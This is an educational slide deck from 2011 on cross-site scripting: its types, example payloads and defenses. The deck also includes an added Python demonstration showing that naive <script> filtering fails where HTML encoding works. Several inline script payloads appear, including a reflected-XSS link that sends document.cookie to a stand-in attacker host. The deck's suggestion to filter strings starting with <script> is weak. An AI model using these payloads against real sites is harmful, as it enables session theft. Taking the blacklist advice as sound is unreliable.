Cross Site Scripting (XSS)
Ashish Dhital, 21st April 2011
XSS: Background
• Web sites are ubiquitous today
• Immense popularity brings a variety of attacks
• Mostly SQL injection, DoS, XSS
• Outline: XSS introduction, types, defense and conclusion
XSS: Introduction
• XSS exploits websites by inserting malicious client-side scripts into dynamic pages
  – Makes use of browser vulnerabilities
  – Bypasses the same-origin policy enforced by the browser
• Exploitation of HTML, JS, VBScript, ActiveX
• Objective – session hijacking, redirection, stealing information
• 80% of attacks against websites today
• In 2010, various XSS vulnerabilities were found in Amazon, eBay, PayPal, American Express
• McAfee's site has been shown to have XSS vulnerabilities (as of March 2011)
XSS: Script Insertion
• Examples of insertion of scripts in HTML tags
  <BODY ONLOAD="alert('evilmessage')" />
  <IMG SRC="javascript:alert('evilmessage')" />
  <LINK REL="STYLESHEET" HREF="javascript:alert('evilmessage')" />
• Flash exploitation
  <EMBED SRC="http://dangeroussite.com/evilflash.swf" AllowScriptAccess="always" />
XSS: Types
• DOM-based attack
• Reflected / non-persistent attack
• Stored / persistent attack
XSS: DOM Based Attack
• Exploitation of DOM entities
  – document.location, document.URL and document.referrer properties
• Payload in the URL sent to unsuspecting users
  http://www.genuinewebsite.com/getAC.php?username=<script>alert("harmful script")</script>
• Unexpected/undesired execution of client-side script
XSS: Reflected / Non-Persistent
• Most common form of XSS attack
• Data provided by the web client is immediately used by the web server to build the page it sends back
  – Confirmation pages, error pages, search queries
• Usually a malicious link delivered by social engineering techniques
  Ex. http://www.genuinesite.com/getAc.php?username=<script>document.location='http://attackersite.ample/cgibin/stolencookie.cgi?'+document.cookie</script>
XSS: Stored / Persistent
• Most powerful one in terms of the possible damage
• Malicious code inserted into a form or input field is stored on the server
• Could infect other users and the web server, and propagate rapidly
• Example: the attacker inserts a script as a blog post (of course the input text is not filtered or sanitized). A user who visits the site later clicks on the blog post, and the script executes! Possible worm?
XSS: Defense and Prevention
• User input validation / sanitization, parameter verification
• Careful checking of every HTTP request value before it is written into HTML output
• Filtering out unnecessary characters using regular expressions
  Example: filtering out anything that starts with <script>
XSS: Defense and Prevention
• Data verification for the various properties of HTML tags, such as attributes, style and width
• Cookie protection
  – Cookie – holds information about the surfer
  – IP address verification (effective behind a proxy server?)
  – HttpOnly flag
  – Possible solution – Triple DES encryption
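The two defense slides above suggest filtering out anything that starts with <script>; the example below (added here, not from the slides) contrasts that blacklist with output encoding, using the reflected getAc.php case from the earlier slide as the vulnerable page. The render_page() function, the constructed payloads and the name getAc.php stand-in are assumptions for illustration; every payload only calls alert().

```python
import html
import re

# Constructed test inputs modelled on the deck's examples (alert() only).
PAYLOADS = [
    '<script>alert("harmful script")</script>',   # the deck's own example
    '<SCRIPT>alert(1)</SCRIPT>',                  # case variant
    '<scr<script>ipt>alert(1)</script>',          # survives one stripping pass
    '<img src=x onerror=alert(1)>',               # no <script> tag at all
]

NAIVE_RE = re.compile(r"<script>")


def naive_filter(value: str) -> str:
    """The slide's defense taken literally: strip the string '<script>'."""
    return NAIVE_RE.sub("", value)


def encode_for_html(value: str) -> str:
    """Output encoding: <, >, &, ' and " become entities, so nothing the
    user supplied can open or close markup in the HTML body."""
    return html.escape(value, quote=True)


def render_page(username: str, sanitizer) -> str:
    """Stand-in for getAc.php (hypothetical): echoes the username into
    the page body after passing it through the chosen sanitizer."""
    return f"<p>Welcome, {sanitizer(username)}</p>"


TRUSTED_PREFIX, TRUSTED_SUFFIX = "<p>Welcome, ", "</p>"
# A '<' followed by a letter, '/' or '!' is enough to start a tag.
MARKUP_RE = re.compile(r"<[A-Za-z/!]")


def user_part_contains_markup(page: str) -> bool:
    """True if the user-controlled part of the page can still form a tag."""
    body = page[len(TRUSTED_PREFIX):-len(TRUSTED_SUFFIX)]
    return MARKUP_RE.search(body) is not None


if __name__ == "__main__":
    for p in PAYLOADS:
        print("blacklist :", user_part_contains_markup(render_page(p, naive_filter)))
        print("encoding  :", user_part_contains_markup(render_page(p, encode_for_html)))
```

Every payload still yields live markup after the blacklist, including the deck's own example (its closing tag survives), while the encoded output never does.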
XSS: Defense and Prevention
• Available tools to minimize XSS attacks
  – Noxes: Windows-based personal firewall configured for browser-based connections
  – Samurai
  – XJs
XSS: Defense and Prevention
• How can a user defend oneself from XSS attacks?
  – Disabling scripts when not required
  – Avoiding clicks on unknown sites, URLs or message boards
  – Accessing a site through its own address and not through third-party sites
  – Keeping oneself updated about sites and message boards that have been blacklisted as malicious
XSS: Conclusion
• Preventive steps may work for the vulnerabilities known today
• Hackers are always at work to discover zero-day vulnerabilities
• Web development teams should constantly update themselves
• Security is an ongoing process!
XSS: References
• Bodmer, Fabrice. Cross-Site Scripting (XSS). Computer and Network Security Seminar. Web. 12 Apr. 2011. <http://diuf.unifr.ch/drupal/tns/sites/diuf.unifr.ch.drupal.tns/files/Teaching/2006_2007/Computer_Security_Threats_and_Counter_Measures/Bodmer_CrossSiteScripting.pdf>
• Kirda, Engin, Christopher Kruegel, Giovanni Vigna, and Nenad Jovanovic. Noxes: A Client-Side Solution for Mitigating Cross-Site Scripting Attacks. Web. 12 Apr. 2011. <http://www.cs.ucsb.edu/~vigna/publications/2006_kirda_kruegel_vigna_jovanovic_SAC.pdf>
• Mohammadi, S., and Farhad Koohbor. Protecting Cookies against Cross-site Scripting Attacks Using Cryptography. WSEAS. Web. 12 Apr. 2011. <http://www.wseas.us/e-library/conferences/2010/Merida/ISPACT/ISPACT-02.pdf>
• Sharma, Anand. "Prevent a Cross-Site Scripting Attack." IBM developerWorks, 03 Feb. 2004. Web. 12 Apr. 2011. <http://www.ibm.com/developerworks/web/library/wa-secxss/>
• "Cross-site Scripting (XSS) - OWASP." OWASP (Open Web Application Security Project). Fortify Software, 10 Oct. 2010. Web. 16 Apr. 2011. <https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)>
• "Cross-site Scripting." Wikipedia, the Free Encyclopedia. Web. 17 Apr. 2011. <http://en.wikipedia.org/wiki/Cross-site_scripting>
• XSSed | Cross Site Scripting (XSS) Attacks Information and Archive. Web. 17 Apr. 2011. <http://www.xssed.com/>